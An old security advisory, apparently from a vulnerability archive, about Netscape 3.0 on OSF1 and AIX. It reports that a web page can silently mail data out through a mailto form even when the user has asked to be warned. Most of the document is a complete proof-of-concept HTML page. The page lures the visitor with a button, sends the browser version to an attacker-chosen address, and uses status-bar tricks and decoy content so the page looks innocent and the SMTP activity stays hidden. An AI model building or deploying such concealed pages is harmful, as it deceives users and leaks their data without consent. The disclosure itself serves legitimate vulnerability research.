COMMAND

    Netscape 3.0

SYSTEMS AFFECTED

    OSF1, AIX

PROBLEM

    The following  script send  automatically a  mail.   It was tested
    with Netscape 3.0 for OSF1 and  for AIX.  It visibly doesn't  care
    if the "Show alert before playing with email" checkbox is set.

    The use of a get method and of a text/plain mime-type seems to  be
    a good enough reason for Netscape to send mail directly..

    This script try to hide its action as much as possible: A look  at
    view-source  when  this  page  is   loaded  should  show  a   very
    innocent-looking page..

    ---------- Begin of HTML source ----------
    
    <HTML>
    <SCRIPT>
    <!--
    
    //////////////////////////////////
    // First, some silly functions. //
    //////////////////////////////////
    
    var kickme;
    
    function hide() {
	    top.status="I'm loading my world, please wait!";
	    kickme=setTimeout("hide()",100);
    }
    
    function FabulousWorld() {
	    clearTimeout(kickme);
	    document.open("text/html");
	    document.writeln("<HTML><HEAD><TITLE>My World!</TITLE><HEAD>");
	    document.writeln("<BODY bgcolor=red text=green link=yellow>");
	    document.writeln("<CENTER><H1> My world... </H1>");
	    document.writeln("<H3><BLINK>This page is Javascript enabled!</BLINK></H3>");
    // Insert your bookmarks here...
	    document.writeln("</BODY></HTML>");
	    document.close();
    }
    
    ///////////////////////////////
    // Serious stuff begin here! //
    ///////////////////////////////
    
    function form_handler() {
	    document.forms[0].method="get";
	    document.forms[0].encoding="text/plain";
	    document.forms[0].action="mailto:user@host.com?subject=a good bug never dies...";
		    // Remember to put YOUR adress when you test this page...
    
	    document.forms[0].text.value="Browser used: "+navigator.appVersion;
    
	    setTimeout("FabulousWorld()",12000);    // This is not elegant..
						    // but if we change the page before the mail is sent,
						    // nothing is sent...
    
	    kickme=setTimeout("hide()",100);        // This is just a way to
						    // hide some status
						    // mentionning an
						    // access to your
						    // favorite SMTP server!
    }
    
    
    
    // Then, we generate a very usual page.
    // The only 'unusual' thing is the onsubmit() handler.
    
    document.writeln('\
    <HTML>\
    <HEAD>\
    <TITLE>Welcome in my world!</TITLE>\
    </HEAD>\
    <BODY bgcolor=black text=yellow>\
    <CENTER><H1>Welcome</H1>\
    <BR><BR><BR><BR><BR>\
    <FONT Color=White>\
    <FORM onsubmit="form_handler()" >\
    <INPUT type="hidden" name="text">\
    <INPUT TYPE="submit" value="Click Here to Enter my Fabulous Realm!" >\
    </CENTER>\ </FORM></FONT>\
    </BODY>\
    </HTML>');
    
    
    // -->
    </SCRIPT>
    </HTML>
    
    ---------- End of HTML source ----------